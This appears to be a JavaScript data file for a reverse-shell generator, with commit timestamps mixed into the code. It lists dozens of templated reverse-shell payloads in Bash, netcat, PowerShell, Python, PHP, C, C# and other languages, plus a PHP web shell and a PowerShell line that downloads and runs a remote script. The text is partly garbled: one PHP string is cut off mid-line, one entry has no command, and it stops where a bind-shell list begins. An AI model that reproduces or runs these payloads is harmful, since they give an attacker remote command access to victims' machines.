2021-03-15 23:09:02 +00:00
const CommandType = {
'ReverseShell' : 'ReverseShell' ,
'BindShell' : 'BindShell' ,
'MSFVenom' : 'MSFVenom'
} ;
2021-02-28 00:34:59 +00:00
2021-03-15 23:09:02 +00:00
const withCommandType = function ( commandType , elements ) {
return elements . map ( ( element ) => {
return {
... element ,
meta : [
... element . meta ,
commandType
]
}
} ) ;
}
2021-03-14 00:42:11 +00:00
2021-03-15 23:09:02 +00:00
const reverseShellCommands = withCommandType (
CommandType . ReverseShell ,
[
{
2021-03-14 00:42:11 +00:00
"name" : "Bash -i" ,
"command" : "{shell} -i >& /dev/tcp/{ip}/{port} 0>&1" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "Bash 196" ,
"command" : "0<&196;exec 196<>/dev/tcp/{ip}/{port}; {shell} <&196 >&196 2>&196" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "Bash read line" ,
"command" : "exec 5<>/dev/tcp/{ip}/{port};cat <&5 | while read line; do $line 2>&5 >&5; done" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "Bash 5" ,
"command" : "{shell} -i 5<> /dev/tcp/{ip}/{port} 0<&5 1>&5 2>&5" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "Bash udp" ,
"command" : "{shell} -i >& /dev/udp/{ip}/{port} 0>&1" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "nc mkfifo" ,
"command" : "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|nc {ip} {port} >/tmp/f" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "nc -e" ,
"command" : "nc -e {shell} {ip} {port}" ,
2021-03-14 21:55:08 +00:00
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "nc.exe -e" ,
"command" : "nc -e {shell} {ip} {port}" ,
"meta" : [ "windows" ]
2021-03-14 00:42:11 +00:00
} ,
{
"name" : "nc -c" ,
"command" : "nc -c {shell} {ip} {port}" ,
2021-03-14 21:55:08 +00:00
"meta" : [ "linux" , "mac" ]
2021-03-14 00:42:11 +00:00
} ,
{
"name" : "ncat -e" ,
2021-03-14 21:55:08 +00:00
"command" : "ncat {ip} {port} -e {shell}" ,
2021-03-14 00:42:11 +00:00
"meta" : [ "linux" , "mac" ]
} ,
2021-03-14 21:55:08 +00:00
{
"name" : "ncat.exe -e" ,
"command" : "ncat.exe {ip} {port} -e {shell}" ,
"meta" : [ "windows" ]
} ,
2021-03-14 00:42:11 +00:00
{
"name" : "ncat udp" ,
"command" : "ncat {ip} {port} -e {shell}" ,
"meta" : [ "linux" , "mac" ]
} ,
{
2021-03-14 21:55:08 +00:00
"name" : "C" ,
2021-05-07 08:29:23 +00:00
"command" : "#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n\nint main(void){\n int port = {port};\n struct sockaddr_in revsockaddr;\n\n int sockt = socket(AF_INET, SOCK_STREAM, 0);\n revsockaddr.sin_family = AF_INET; \n revsockaddr.sin_port = htons(port);\n revsockaddr.sin_addr.s_addr = inet_addr(\"{ip}\");\n\n connect(sockt, (struct sockaddr *) &revsockaddr, \n sizeof(revsockaddr));\n dup2(sockt, 0);\n dup2(sockt, 1);\n dup2(sockt, 2);\n\n char * const argv[] = {\"{shell}\", NULL};\n execve(\"{shell}\", argv, NULL);\n\n return 0; \n}" ,
2021-07-16 17:31:24 +00:00
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "C Windows" ,
2021-07-16 17:33:27 +00:00
"command" : "#include <winsock2.h>\r\n#include <stdio.h>\r\n#pragma comment(lib,\"ws2_32\")\r\n\r\nWSADATA wsaData;\r\nSOCKET Winsock;\r\nstruct sockaddr_in hax; \r\nchar ip_addr[16] = \"{ip}\"; \r\nchar port[6] = \"{port}\"; \r\n\r\nSTARTUPINFO ini_processo;\r\n\r\nPROCESS_INFORMATION processo_info;\r\n\r\nint main()\r\n{\r\n WSAStartup(MAKEWORD(2, 2), &wsaData);\r\n Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);\r\n\r\n\r\n struct hostent *host; \r\n host = gethostbyname(ip_addr);\r\n strcpy_s(ip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));\r\n\r\n hax.sin_family = AF_INET;\r\n hax.sin_port = htons(atoi(port));\r\n hax.sin_addr.s_addr = inet_addr(ip_addr);\r\n\r\n WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);\r\n\r\n memset(&ini_processo, 0, sizeof(ini_processo));\r\n ini_processo.cb = sizeof(ini_processo);\r\n ini_processo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; \r\n ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;\r\n\r\n TCHAR cmd[255] = TEXT(\"cmd.exe\");\r\n\r\n CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);\r\n\r\n return 0;\r\n}" ,
"meta" : [ "windows" ]
2021-03-14 00:42:11 +00:00
} ,
2021-03-14 21:55:08 +00:00
{
"name" : "C#" ,
2021-03-21 16:07:18 +00:00
"command" : "using System;\nusing System.Text;\nusing System.IO;\nusing System.Diagnostics;\nusing System.ComponentModel;\nusing System.Linq;\nusing System.Net;\nusing System.Net.Sockets;\n\n\nnamespace ConnectBack\n{\n\tpublic class Program\n\t{\n\t\tstatic StreamWriter streamWriter;\n\n\t\tpublic static void Main(string[] args)\n\t\t{\n\t\t\tusing(TcpClient client = new TcpClient(\"{ip}\", {port}))\n\t\t\t{\n\t\t\t\tusing(Stream stream = client.GetStream())\n\t\t\t\t{\n\t\t\t\t\tusing(StreamReader rdr = new StreamReader(stream))\n\t\t\t\t\t{\n\t\t\t\t\t\tstreamWriter = new StreamWriter(stream);\n\t\t\t\t\t\t\n\t\t\t\t\t\tStringBuilder strInput = new StringBuilder();\n\n\t\t\t\t\t\tProcess p = new Process();\n\t\t\t\t\t\tp.StartInfo.FileName = \"cmd.exe\";\n\t\t\t\t\t\tp.StartInfo.CreateNoWindow = true;\n\t\t\t\t\t\tp.StartInfo.UseShellExecute = false;\n\t\t\t\t\t\tp.StartInfo.RedirectStandardOutput = true;\n\t\t\t\t\t\tp.StartInfo.RedirectStandardInput = true;\n\t\t\t\t\t\tp.StartInfo.RedirectStandardError = true;\n\t\t\t\t\t\tp.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);\n\t\t\t\t\t\tp.Start();\n\t\t\t\t\t\tp.BeginOutputReadLine();\n\n\t\t\t\t\t\twhile(true)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tstrInput.Append(rdr.ReadLine());\n\t\t\t\t\t\t\t//strInput.Append(\"\\n\");\n\t\t\t\t\t\t\tp.StandardInput.WriteLine(strInput);\n\t\t\t\t\t\t\tstrInput.Remove(0, strInput.Length);\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tprivate static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)\n {\n StringBuilder strOutput = new StringBuilder();\n\n if (!String.IsNullOrEmpty(outLine.Data))\n {\n try\n {\n strOutput.Append(outLine.Data);\n streamWriter.WriteLine(strOutput);\n streamWriter.Flush();\n }\n catch (Exception err) { }\n }\n }\n\n\t}\n}" ,
2021-03-14 21:55:08 +00:00
"meta" : [ "linux" , "windows" ]
} ,
{
"name" : "Haskell #1" ,
"command" : "module Main where\n\nimport System.Process\n\nmain = callCommand \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | {shell} -i 2>&1 | nc {ip} {port} >/tmp/f\"" ,
"meta" : [ "linux" , "mac" ]
} ,
2021-03-14 00:42:11 +00:00
{
"name" : "Perl" ,
"command" : "perl -e 'use Socket;$i=\"{ip}\";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"{shell} -i\");};'" ,
2021-03-14 21:55:08 +00:00
"meta" : [ "linux" , "mac" ]
2021-03-14 00:42:11 +00:00
} ,
{
"name" : "Perl no sh" ,
2021-04-24 19:53:41 +00:00
"command" : "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"{ip}:{port}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'" ,
2021-03-14 21:55:08 +00:00
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "PHP Emoji" ,
"command" : "php -r '$😀=\"1\";$😁=\"2\";$😅=\"3\";$😆=\"4\";$😉=\"5\";$😊=\"6\";$😎=\"7\";$😍=\"8\";$😚=\"9\";$🙂=\"0\";$🤢=\" \";$🤓=\"<\";$🤠=\">\";$😱=\"-\";$😵=\"&\";$🤩=\"i\";$🤔=\".\";$🤨=\"/\";$🥰=\"a\";$😐=\"b\";$😶=\"i\";$🙄=\"h\";$😂=\"c\";$🤣=\"d\";$😃=\"e\";$😄=\"f\";$😋=\"k\";$😘=\"n\";$😗=\"o\";$😙=\"p\";$🤗=\"s\";$😑=\"x\";$💀 = $😄. $🤗. $😗. $😂. $😋. $😗. $😙. $😃. $😘;$🚀 = \"{ip}\";$💻 = {port};$🐚 = \"{shell}\". $🤢. $😱. $🤩. $🤢. $🤓. $😵. $😅. $🤢. $🤠. $😵. $😅. $🤢. $😁. $🤠. $😵. $😅;$🤣 = $💀($🚀,$💻);$👽 = $😃. $😑. $😃. $😂;$👽($🐚);'" ,
"meta" : [ "linux" , "mac" ]
2021-03-14 00:42:11 +00:00
} ,
{
"name" : "PHP PentestMonkey" ,
2021-05-07 08:29:23 +00:00
"command" : "<?php\n// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php\n// Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\nset_time_limit (0);\n$VERSION = \"1.0\";\n$ip = '{ip}';\n$port = {port};\n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n$shell = 'uname -a; w; id; {shell} -i';\n$daemon = 0;\n$debug = 0;\n\nif (function_exists('pcntl_fork')) {\n\t$pid = pcntl_fork();\n\t\n\tif ($pid == -1) {\n\t\tprintit(\"ERROR: Can't fork\");\n\t\texit(1);\n\t}\n\t\n\tif ($pid) {\n\t\texit(0); // Parent exits\n\t}\n\tif (posix_setsid() == -1) {\n\t\tprintit(\"Error: Can't setsid()\");\n\t\texit(1);\n\t}\n\n\t$daemon = 1;\n} else {\n\tprintit(\"WARNING: Failed to daemonise. This is quite common and not fatal.\");\n}\n\nchdir(\"/\");\n\numask(0);\n\n// Open reverse connection\n$sock = fsockopen($ip, $port, $errno, $errstr, 30);\nif (!$sock) {\n\tprintit(\"$errstr ($errno)\");\n\texit(1);\n}\n\n$descriptorspec = array(\n 0 => array(\"pipe\", \"r\"), // stdin is a pipe that the child will read from\n 1 => array(\"pipe\", \"w\"), // stdout is a pipe that the child will write to\n 2 => array(\"pipe\", \"w\") // stderr is a pipe that the child will write to\n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n\tprintit(\"ERROR: Can't spawn shell\");\n\texit(1);\n}\n\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\nprintit(\"Successfully opened reverse shell to $ip:$port\");\n\nwhile (1) {\n\tif (feof($sock)) {\n\t\tprintit(\"ERROR: Shell connection terminated\");\n\t\tbreak;\n\t}\n\n\tif (feof($pipes[1])) {\n\t\tprintit(\"ERROR: Shell process terminated\");\n\t\tbreak;\n\t}\n\n\t$read_a = array($sock, $pipes[1], $pipes[2]);\n\t$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n\tif (in_array($sock, $read_a)) {\n\t\tif ($debug) printit(\"SOCK READ\");\n\t\t$input = fread($sock, $chunk_size);\n\t\tif ($debug) printit(\"SOCK: $input\");\n\t\tfwrite($pipes[0], $input);\n\t}\n\n\tif (in_array($pipes[1], $read_a)) {\n\t\tif ($debug) printit(\"STDOUT READ\");\n\t\t$input = fread($pipes[1], $chunk_size);\n\t\tif ($debug) printit(\"STDOUT: $input\");\n\t\tfwrite($sock, $input);\n\t}\n\n\tif (in_array($pipes[2], $read_a)) {\n\t\tif ($debug) printit(\"STDERR READ\");\n\t\t$input = fread($pipes[2], $chunk_size);\n\t\tif ($debug) printit(\"STDERR: $input\");\n\t\tfwrite($sock, $input);\n\t}\n}\n\nfclose($sock);\nfclose($pipes[0]);\nfclose($pipes[1]);\nfclose($pipes[2]);\nproc_close($process);\n\nfunction printit ($string) {\n\tif (!$daemon) {\n\t\tprint \"$string\\n\";\n\t}\n}\n\n?>" ,
2021-03-14 00:42:11 +00:00
"meta" : [ "linux" , "windows" , "mac" ]
} ,
2021-06-16 22:40:38 +00:00
{
2021-06-16 22:54:58 +00:00
"name" : "PHP Ivan Šincek" ,
2021-06-16 22:56:42 +00:00
"command" : "<?php\n// Copyright (c) 2020 Ivan \u0160incek\n// v2.3\n// Requires PHP v5.0.0 or greater.\n// Works on Linux OS, macOS, and Windows OS.\n// See the original script at https://github.com/pentestmonkey/php-reverse-shell.\nclass Shell {\n private $addr = null;\n private $port = null;\n private $os = null;\n private $shell = null;\n private $descriptorspec = array(\n 0 => array(\'pipe\', \'r\'), // shell can read from STDIN\n 1 => array(\'pipe\', \'w\'), // shell can write to STDOUT\n 2 => array(\'pipe\', \'w\') // shell can write to STDERR\n );\n private $buffer = 1024; // read/write buffer size\n private $clen = 0; // command length\n private $error = false; // stream read/write error\n public function __construct($addr, $port) {\n $this->addr = $addr;\n $this->port = $port;\n }\n private function detect() {\n $detected = true;\n if (stripos(PHP_OS, \'LINUX\') !== false) { // same for macOS\n $this->os = \'LINUX\';\n $this->shell = \'{shell}\';\n } else if (stripos(PHP_OS, \'WIN32\') !== false || stripos(PHP_OS, \'WINNT\') !== false || stripos(PHP_OS, \'WINDOWS\') !== false) {\n $this->os = \'WINDOWS\';\n $this->shell = \'cmd.exe\';\n } else {\n $detected = false;\n echo \"SYS_ERROR: Underlying operating system is not supported, script will now exit...\\n\";\n }\n return $detected;\n }\n private function daemonize() {\n $exit = false;\n if (!function_exists(\'pcntl_fork\')) {\n echo \"DAEMONIZE: pcntl_fork() does not exists, moving on...\\n\";\n } else if (($pid = @pcntl_fork()) < 0) {\n echo \"DAEMONIZE: Cannot fork off the parent process, moving on...\\n\";\n } else if ($pid > 0) {\n $exit = true;\n echo \"DAEMONIZE: Child process forked off successfully, parent process will now exit...\\n\";\n } else if (posix_setsid() < 0) {\n // once daemonized you will actually no longer see the script\'s dump\n echo \"DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\\n\";\n } else {\n echo \"DAEMONIZE: Completed successfully!\\n\";\n }\n return $exit;\n }\n private function settings() {\n @error_reporting(0);\n @set_time_limit(0); // do not impose the script execution time limit\n @umask(0); // set the file/directory permissions - 666 for files and 777 for directories\n }\n private function dump($data) {\n $data = str_replace(\'<\', \'<\', $data);\n $data = str_replace(\'>\', \'>\', $data);\n echo $data;\n }\n private function read($stream, $name, $buffer) {\n if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream\n $this->error = true; // set global error flag\n echo \"STRM_ERROR: Cannot read from ${name}, script will now exit...\\n\";\n }\n return $data;\n }\n private function write($stream, $name, $data) {\n if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream\n $this->error = true; // set global error flag\n echo \"STRM_ERROR: Cannot write to ${name}, script will now exit...\\n\" ; \ n } \ n return $bytes ; \ n } \ n // read/write method for non-blocking streams\n private function rw($input, $output, $iname, $oname) {\n while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {\n if ($this->os === \'WINDOWS\' && $oname === \'STDIN\') { $this->clen += strlen($data); } // calculate the command length\n $this->dump($data); // script\'s dump\n }\n }\n // read/write method for blocking streams (e.g. for STDOUT and
2021-06-16 22:40:38 +00:00
"meta" : [ "linux" , "windows" , "mac" ]
} ,
2021-03-14 00:42:11 +00:00
{
"name" : "PHP cmd" ,
2021-05-07 08:29:23 +00:00
"command" : "<html>\n<body>\n<form method=\"GET\" name=\"<?php echo basename($_SERVER[\'PHP_SELF\']); ?>\">\n<input type=\"TEXT\" name=\"cmd\" id=\"cmd\" size=\"80\">\n<input type=\"SUBMIT\" value=\"Execute\">\n<\/form>\n<pre>\n<?php\n if(isset($_GET[\'cmd\']))\n {\n system($_GET[\'cmd\']);\n }\n?>\n<\/pre>\n<\/body>\n<script>document.getElementById(\"cmd\").focus();<\/script>\n<\/html>" ,
2021-03-14 00:42:11 +00:00
"meta" : [ "linux" , "windows" , "mac" ]
} ,
{
"name" : "PHP exec" ,
"command" : "php -r '$sock=fsockopen(\"{ip}\",{port});exec(\"{shell} <&3 >&3 2>&3\");'" ,
2021-03-14 21:55:08 +00:00
"meta" : [ "linux" , , "mac" ]
2021-03-14 00:42:11 +00:00
} ,
{
"name" : "PHP shell_exec" ,
"command" : "php -r '$sock=fsockopen(\"{ip}\",{port});shell_exec(\"{shell} <&3 >&3 2>&3\");'" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "PHP system" ,
"command" : "php -r '$sock=fsockopen(\"{ip}\",{port});system(\"{shell} <&3 >&3 2>&3\");'" ,
2021-03-14 21:55:08 +00:00
"meta" : [ "linux" , "windows" , "mac" ]
2021-03-14 00:42:11 +00:00
} ,
{
"name" : "PHP passthru" ,
"command" : "php -r '$sock=fsockopen(\"{ip}\",{port});passthru(\"{shell} <&3 >&3 2>&3\");'" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "PHP `" ,
"command" : "php -r '$sock=fsockopen(\"{ip}\",{port});`{shell} <&3 >&3 2>&3`;'" ,
"meta" : [ "linux" , "windows" , "mac" ]
} ,
{
"name" : "PHP popen" ,
"command" : "php -r '$sock=fsockopen(\"{ip}\",{port});popen(\"{shell} <&3 >&3 2>&3\", \"r\");'" ,
"meta" : [ "linux" , "windows" , "mac" ]
} ,
2021-06-04 07:49:13 +00:00
{
"name" : "PHP proc_open" ,
2021-06-04 14:23:22 +00:00
"command" : "php -r '$sock=fsockopen(\"{ip}\",{port});$proc=proc_open(\"{shell}\", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'" ,
2021-06-04 07:49:13 +00:00
"meta" : [ "linux" , "windows" , "mac" ]
} ,
2021-03-14 00:42:11 +00:00
{
"name" : "Windows ConPty" ,
"command" : "IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {ip} {port}" ,
2021-03-14 21:55:08 +00:00
"meta" : [ "windows" ]
2021-03-14 00:42:11 +00:00
} ,
{
"name" : "PowerShell #1" ,
"command" : "powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"{ip}\",{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ,
2021-03-14 21:55:08 +00:00
"meta" : [ "windows" ]
2021-03-14 00:42:11 +00:00
} ,
{
"name" : "PowerShell #2" ,
"command" : "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('{ip}',{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"" ,
2021-03-14 21:55:08 +00:00
"meta" : [ "windows" ]
2021-03-14 00:42:11 +00:00
} ,
2021-04-18 13:35:02 +00:00
{
"name" : "PowerShell #3" ,
2021-04-18 13:49:38 +00:00
"command" : "powershell -nop -W hidden -noni -ep bypass -c \"$TCPClient = New-Object Net.Sockets.TCPClient('{ip}', {port});$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()\"" ,
2021-04-18 13:35:02 +00:00
"meta" : [ "windows" ]
2021-03-14 00:42:11 +00:00
} ,
2021-04-18 14:02:11 +00:00
{
"name" : "PowerShell #4 (TLS)" ,
"command" : "powershell -nop -W hidden -noni -ep bypass -c \"$TCPClient = New-Object Net.Sockets.TCPClient('{ip}', {port});$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()};WriteToStream '';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()\"" ,
"meta" : [ "windows" ]
} ,
2021-03-14 00:42:11 +00:00
{
"name" : "PowerShell #3 (Base64)" ,
2021-03-14 21:55:08 +00:00
"meta" : [ "windows" ]
2021-03-14 00:42:11 +00:00
} ,
{
"name" : "Python #1" ,
"command" : "export RHOST=\"{ip}\";export RPORT={port};python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"{shell}\")'" ,
2021-03-14 21:55:08 +00:00
"meta" : [ "linux" , "mac" ]
2021-03-14 00:42:11 +00:00
} ,
{
"name" : "Python #2" ,
"command" : "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ip}\",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"{shell}\")'" ,
2021-03-14 21:55:08 +00:00
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "Python3 #1" ,
2021-05-30 12:37:18 +00:00
"command" : "export RHOST=\"{ip}\";export RPORT={port};python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"{shell}\")'" ,
2021-03-14 21:55:08 +00:00
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "Python3 #2" ,
"command" : "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ip}\",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"{shell}\")'" ,
"meta" : [ "linux" , "mac" ]
2021-03-14 00:42:11 +00:00
} ,
2021-05-29 11:18:54 +00:00
{
"name" : "Python3 shortest" ,
2021-05-30 14:49:38 +00:00
"command" : "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"{ip}\",{port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"{shell}\")'" ,
2021-05-29 11:18:54 +00:00
"meta" : [ "linux" ]
} ,
2021-03-14 00:42:11 +00:00
{
"name" : "Ruby #1" ,
2021-07-01 08:15:39 +00:00
"command" : "ruby -rsocket -e'spawn(\"sh\",[:in,:out,:err]=>TCPSocket.new(\"{ip}\",{port}))'" ,
2021-03-14 21:55:08 +00:00
"meta" : [ "linux" , "mac" ]
2021-03-14 00:42:11 +00:00
} ,
{
"name" : "Ruby no sh" ,
2021-04-02 09:40:22 +00:00
"command" : "ruby -rsocket -e'exit if fork;c=TCPSocket.new(\"{ip}\",\"{port}\");loop{c.gets.chomp!;(exit! if $_==\"exit\");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts \"failed: #{$_}\"}'" ,
2021-03-14 21:55:08 +00:00
"meta" : [ "linux" , "mac" ]
2021-03-14 00:42:11 +00:00
} ,
{
"name" : "socat #1" ,
"command" : "socat TCP:{ip}:{port} EXEC:{shell}" ,
2021-03-14 21:55:08 +00:00
"meta" : [ "linux" , "mac" ]
2021-03-14 00:42:11 +00:00
} ,
{
"name" : "socat #2 (TTY)" ,
"command" : "socat TCP:{ip}:{port} EXEC:'{shell}',pty,stderr,setsid,sigint,sane" ,
2021-03-14 21:55:08 +00:00
"meta" : [ "linux" , "mac" ]
2021-03-14 00:42:11 +00:00
} ,
{
"name" : "node.js" ,
"command" : "require('child_process').exec('nc -e {shell} {ip} {port}')" ,
2021-03-14 21:55:08 +00:00
"meta" : [ "linux" , "mac" ]
2021-03-14 00:42:11 +00:00
} ,
{
"name" : "Java #1" ,
"command" : "import java.io.BufferedReader;\nimport java.io.InputStreamReader;\n\npublic class shell {\n public static void main(String args[]) {\n String s;\n Process p;\n try {\n p = Runtime.getRuntime().exec(\"bash -c $@|bash 0 echo bash -i >& /dev/tcp/{ip}/{port} 0>&1\");\n p.waitFor();\n p.destroy();\n } catch (Exception e) {}\n }\n}" ,
2021-03-14 21:55:08 +00:00
"meta" : [ "linux" , "mac" ]
2021-03-14 00:42:11 +00:00
} ,
{
"name" : "telnet" ,
"command" : "TF=$(mktemp -u);mkfifo $TF && telnet {ip} {port} 0<$TF | {shell} 1>$TF" ,
2021-03-14 21:55:08 +00:00
"meta" : [ "linux" , "mac" ]
2021-03-14 00:42:11 +00:00
} ,
{
2021-03-14 21:55:08 +00:00
"name" : "zsh" ,
"command" : "zsh -c 'zmodload zsh/net/tcp && ztcp {ip} {port} && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'" ,
"meta" : [ "linux" , "mac" ]
2021-07-18 15:25:02 +00:00
} ,
{
"name" : "Lua #1" ,
"command" : "lua -e \"require('socket');require('os');t=socket.tcp();t:connect('{ip}','{port}');os.execute('{shell} -i <&3 >&3 2>&3');\"" ,
"meta" : [ "linux" ]
} ,
{
"name" : "Lua #2" ,
"command" : "lua5.1 -e 'local host, port = \"{ip}\", {port} local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, \"r\") local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()'" ,
"meta" : [ "linux" , "windows" ]
} ,
{
"name" : "Golang" ,
"command" : "echo 'package main;import\"os/exec\";import\"net\";func main(){c,_:=net.Dial(\"tcp\",\"{ip}:{port}\");cmd:=exec.Command(\"{shell}\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go" ,
"meta" : [ "linux" , "mac" , "windows" ]
} ,
{
"name" : "Awk" ,
"command" : "awk 'BEGIN {s = \"/inet/tcp/0/{ip}/{port}\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null" ,
"meta" : [ "linux" , "mac" ]
} ,
{
"name" : "Dart" ,
"command" : "import 'dart:io';\nimport 'dart:convert';\n\nmain() {\n Socket.connect(\"{ip}\", {port}).then((socket) {\n socket.listen((data) {\n Process.start('{shell}', []).then((Process process) {\n process.stdin.writeln(new String.fromCharCodes(data).trim());\n process.stdout\n .transform(utf8.decoder)\n .listen((output) { socket.write(output); });\n });\n },\n onDone: () {\n socket.destroy();\n });\n });\n}" ,
"meta" : [ "linux" , "mac" , "windows" ]
2021-03-15 23:09:02 +00:00
}
]
) ;
const bindShellCommands = withCommandType (
CommandType . BindShell ,
[
{
"name" : "Python3 Bind" ,
